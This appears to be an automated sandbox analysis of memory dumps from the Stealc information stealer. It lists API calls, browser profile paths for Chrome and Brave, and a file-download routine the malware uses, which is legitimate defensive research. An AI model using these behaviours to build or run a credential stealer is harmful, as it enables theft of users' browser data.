The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 007745DD
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 007746D8
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 007745D2
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00774678
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00774734
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0077471E
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00774765
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0077462D
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0077474F
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00774643
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 007746B7
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 007745F3
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00774617
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00774662
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0077475A

Memory Dump Source

Source File: 00000011.00000002.2160443976.0000000000771000.00000080.00000001.01000000.00000009.sdmp, Offset: 00770000, based on PE: true

Associated: 00000011.00000002.2159936967.0000000000770000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160599765.000000000078E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160665154.000000000079B000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007BA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007CA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007F5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007F8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007FF000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000802000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000821000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000082E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000830000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000852000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000085F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000087F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000088B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000088E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000915000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000935000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000093B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000009BA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2162587805.00000000009CC000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_770000_stealc_default2.jbxd

Yara matches

Similarity

API ID: lstrlen$Heap$AllocateProcessProtectVirtualstrlen
String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
API String ID: 2127927946-2218711628
Opcode ID: deed3da76807859efddd279fc9be2f509bf3d17107b72aa5a1ef4d370eedd05f
Instruction ID: 944d54d5a243d65659af9eecf82f99b18fdf242cd9a00d736f9afbd62f679bbf
Opcode Fuzzy Hash: deed3da76807859efddd279fc9be2f509bf3d17107b72aa5a1ef4d370eedd05f
Instruction Fuzzy Hash: EB41B8B16C0614FBCB19ABE4EC8DA5C7B71AB48706B70C841F606991A0DBFC95119B3E

Function 00789860 Relevance: 61.5, APIs: 33, Strings: 2, Instructions: 212
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcAddress.KERNEL32(77190000,00CF1BA0), ref: 007898A1
GetProcAddress.KERNEL32(77190000,00CF1CA8), ref: 007898BA
GetProcAddress.KERNEL32(77190000,00CF1BD0), ref: 007898D2
GetProcAddress.KERNEL32(77190000,00CF1C60), ref: 007898EA
GetProcAddress.KERNEL32(77190000,00CF1D38), ref: 00789903
GetProcAddress.KERNEL32(77190000,00CF1600), ref: 0078991B
GetProcAddress.KERNEL32(77190000,00CEACC8), ref: 00789933
GetProcAddress.KERNEL32(77190000,00CEAF08), ref: 0078994C
GetProcAddress.KERNEL32(77190000,00CF1BE8), ref: 00789964
GetProcAddress.KERNEL32(77190000,00CF1C30), ref: 0078997C
GetProcAddress.KERNEL32(77190000,00CF1CC0), ref: 00789995
GetProcAddress.KERNEL32(77190000,00CF1A80), ref: 007899AD
GetProcAddress.KERNEL32(77190000,00CEAE68), ref: 007899C5
GetProcAddress.KERNEL32(77190000,00CF1CF0), ref: 007899DE
GetProcAddress.KERNEL32(77190000,00CF1D50), ref: 007899F6
GetProcAddress.KERNEL32(77190000,00CEAF68), ref: 00789A0E
GetProcAddress.KERNEL32(77190000,00CF1D68), ref: 00789A27
GetProcAddress.KERNEL32(77190000,00CF1AF8), ref: 00789A3F
GetProcAddress.KERNEL32(77190000,00CEB068), ref: 00789A57
GetProcAddress.KERNEL32(77190000,00CF1DE0), ref: 00789A70
GetProcAddress.KERNEL32(77190000,00CEADA8), ref: 00789A88
LoadLibraryA.KERNEL32(00CF1DC8,?,00786A00), ref: 00789A9A
LoadLibraryA.KERNEL32(00CF1DB0,?,00786A00), ref: 00789AAB
LoadLibraryA.KERNEL32(00CF1DF8,?,00786A00), ref: 00789ABD
LoadLibraryA.KERNEL32(00CF1E10,?,00786A00), ref: 00789ACF
LoadLibraryA.KERNEL32(00CF1E28,?,00786A00), ref: 00789AE0
GetProcAddress.KERNEL32(76850000,00CF1E40), ref: 00789B02
GetProcAddress.KERNEL32(77040000,00CF1D80), ref: 00789B23
GetProcAddress.KERNEL32(77040000,00CF1D98), ref: 00789B3B
GetProcAddress.KERNEL32(75A10000,00CF2140), ref: 00789B5D
GetProcAddress.KERNEL32(75690000,00CEAFA8), ref: 00789B7E
GetProcAddress.KERNEL32(776F0000,00CF1610), ref: 00789B9F
GetProcAddress.KERNEL32(776F0000,NtQueryInformationProcess), ref: 00789BB6

Strings

NtQueryInformationProcess, xrefs: 00789BAA
F(t, xrefs: 00789B41

Memory Dump Source

Source File: 00000011.00000002.2160443976.0000000000771000.00000080.00000001.01000000.00000009.sdmp, Offset: 00770000, based on PE: true

Associated: 00000011.00000002.2159936967.0000000000770000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160599765.000000000078E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160665154.000000000079B000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007BA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007CA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007F5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007F8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007FF000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000802000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000821000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000082E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000830000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000852000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000085F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000087F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000088B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000088E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000915000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000935000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000093B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000009BA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2162587805.00000000009CC000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_770000_stealc_default2.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID: F(t$NtQueryInformationProcess
API String ID: 2238633743-4113152680
Opcode ID: 9c8391c2b6b1dd2076ab501354be0556cb27703cd19610f2e8177189524374ac
Instruction ID: 4ee30177c566c9985eafb776c1c552783b58f6f10126482fb125cf9b30858d31
Opcode Fuzzy Hash: 9c8391c2b6b1dd2076ab501354be0556cb27703cd19610f2e8177189524374ac
Instruction Fuzzy Hash: 72A17CB593C240AFC344EFA8EFC89663BF9F74C321754471AE605C3624DA3A9841EB12

Function 0077BE70 Relevance: 37.4, APIs: 17, Strings: 4, Instructions: 675
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0078A740: lstrcpy.KERNEL32(y,00000000), ref: 0078A788

Part of subcall function 0078A920: lstrcpy.KERNEL32(00000000,?), ref: 0078A972
Part of subcall function 0078A920: lstrcatA.KERNEL32(00000000), ref: 0078A982

Part of subcall function 0078A9B0: lstrlenA.KERNEL32(?,00791110,?,00000000,00790AEF), ref: 0078A9C5
Part of subcall function 0078A9B0: lstrcpy.KERNEL32(00000000), ref: 0078AA04
Part of subcall function 0078A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0078AA12

Part of subcall function 0078A8A0: lstrcpy.KERNEL32(?,y), ref: 0078A905

FindFirstFileA.KERNEL32(00000000,?,00790B32,00790B2B,00000000,?,?,?,007913F4,00790B2A), ref: 0077BEF5
StrCmpCA.SHLWAPI(?,007913F8), ref: 0077BF4D
StrCmpCA.SHLWAPI(?,007913FC), ref: 0077BF63
FindNextFileA.KERNELBASE(000000FF,?), ref: 0077C7BF
FindClose.KERNEL32(000000FF), ref: 0077C7D1

Strings

Google Chrome, xrefs: 0077C634
Brave, xrefs: 0077C102
Preferences, xrefs: 0077C11E
\Brave\Preferences, xrefs: 0077C1DB

Memory Dump Source

Source File: 00000011.00000002.2160443976.0000000000771000.00000080.00000001.01000000.00000009.sdmp, Offset: 00770000, based on PE: true

Associated: 00000011.00000002.2159936967.0000000000770000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160599765.000000000078E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160665154.000000000079B000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007BA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007CA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007F5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007F8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007FF000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000802000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000821000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000082E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000830000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000852000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000085F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000087F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000088B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000088E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000915000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000935000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000093B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000009BA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2162587805.00000000009CC000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_770000_stealc_default2.jbxd

Yara matches

Similarity

API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
API String ID: 3334442632-726946144
Opcode ID: 1eab48dedfdc161aee4742db6c37aef47c3c1df87e20afd19f10a01bcc414756
Instruction ID: 36f5e8c28fc05a4dd5dfe0774c8deb26c92ce32062e16b717e585cc8bcfa9e34
Opcode Fuzzy Hash: 1eab48dedfdc161aee4742db6c37aef47c3c1df87e20afd19f10a01bcc414756
Instruction Fuzzy Hash: 80425372950104EBDF14FB70DD9AEED737DAB94300F408569F50A96091EE3CAB49CBA2

Function 00784910 Relevance: 36.9, APIs: 18, Strings: 3, Instructions: 172
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

wsprintfA.USER32 ref: 0078492C
FindFirstFileA.KERNEL32(?,?), ref: 00784943
StrCmpCA.SHLWAPI(?,00790FDC), ref: 00784971
StrCmpCA.SHLWAPI(?,00790FE0), ref: 00784987
FindNextFileA.KERNEL32(000000FF,?), ref: 00784B7D
FindClose.KERNEL32(000000FF), ref: 00784B92

Strings

%s\%s, xrefs: 007849FB
%s\%s, xrefs: 007849A4
%s\*, xrefs: 00784920

Memory Dump Source

Source File: 00000011.00000002.2160443976.0000000000771000.00000080.00000001.01000000.00000009.sdmp, Offset: 00770000, based on PE: true

Associated: 00000011.00000002.2159936967.0000000000770000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160599765.000000000078E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160665154.000000000079B000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007BA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007CA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007F5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007F8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007FF000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000802000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000821000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000082E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000830000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000852000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000085F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000087F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000088B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000088E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000915000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000935000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000093B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000009BA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2162587805.00000000009CC000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_770000_stealc_default2.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstNextwsprintf
String ID: %s\%s$%s\%s$%s\*
API String ID: 180737720-445461498
Opcode ID: d9f5f8545ddee0b744be88116b2991a9d171aa9b388ea94b56143f9495a02c3e
Instruction ID: 85d29ab3eaacbdea0283d19e55d7701cf761b9800f113bdc31cf9236fd2c555a
Opcode Fuzzy Hash: d9f5f8545ddee0b744be88116b2991a9d171aa9b388ea94b56143f9495a02c3e
Instruction Fuzzy Hash: ED6159B1914219AFCB24EBA0DD49EEA737CBB48700F048688F60996141EB75EB45CF91

Function 00783EA0 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 133fileCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 00783EC3
FindFirstFileA.KERNEL32(?,?), ref: 00783EDA
StrCmpCA.SHLWAPI(?,00790FAC), ref: 00783F08
StrCmpCA.SHLWAPI(?,00790FB0), ref: 00783F1E
FindNextFileA.KERNEL32(000000FF,?), ref: 0078406C
FindClose.KERNEL32(000000FF), ref: 00784081

Strings

%s\%s, xrefs: 00783EB7

Memory Dump Source

Source File: 00000011.00000002.2160443976.0000000000771000.00000080.00000001.01000000.00000009.sdmp, Offset: 00770000, based on PE: true

Associated: 00000011.00000002.2159936967.0000000000770000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160599765.000000000078E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160665154.000000000079B000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007BA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007CA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007F5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007F8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007FF000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000802000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000821000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000082E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000830000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000852000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000085F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000087F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000088B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000088E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000915000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000935000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000093B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000009BA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2162587805.00000000009CC000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_770000_stealc_default2.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstNextwsprintf
String ID: %s\%s
API String ID: 180737720-4073750446
Opcode ID: fb60a0f44b1702cca79143a2342da26176ffb49138c0b6d5ee55fea5d58214c0
Instruction ID: 0151bc34c734c9f9f1ba2326460c842051cb31e101b7502c235c726c07fa45b5
Opcode Fuzzy Hash: fb60a0f44b1702cca79143a2342da26176ffb49138c0b6d5ee55fea5d58214c0
Instruction Fuzzy Hash: 8C515BB1914218EBCB24FBB4DD49EEA737CBB44700F4046C8F65996040EB79AB85DF91

Function 007760A0 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 133networkfileCOMMON

Download Yara Rule

APIs

Part of subcall function 0078A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0078A7E6

Part of subcall function 007747B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 007747EA
Part of subcall function 007747B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00774801
Part of subcall function 007747B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00774818
Part of subcall function 007747B0: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00774839
Part of subcall function 007747B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00774849

InternetOpenA.WININET(00790DF7,00000001,00000000,00000000,00000000), ref: 0077610F
StrCmpCA.SHLWAPI(?,00CFD998), ref: 00776147
InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 0077618F
CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 007761B3
InternetReadFile.WININET(a+x,?,00000400,?), ref: 007761DC
WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0077620A
CloseHandle.KERNEL32(?,?,00000400), ref: 00776249
InternetCloseHandle.WININET(a+x), ref: 00776253
InternetCloseHandle.WININET(00000000), ref: 00776260

Strings

a+x, xrefs: 0077624F, 007761D8, 007761DB, 00776252
a+x, xrefs: 007760B0, 0077617F, 00776266, 00776124, 007760B3

Memory Dump Source

Source File: 00000011.00000002.2160443976.0000000000771000.00000080.00000001.01000000.00000009.sdmp, Offset: 00770000, based on PE: true

Associated: 00000011.00000002.2159936967.0000000000770000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160599765.000000000078E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160665154.000000000079B000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007BA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007CA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007F5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007F8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007FF000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000802000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000821000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000082E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000830000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000852000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000085F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000087F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000088B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000088E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000915000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000935000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000093B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000009BA000.00000004.00000001.01000000.00000009.sdmpDownload File
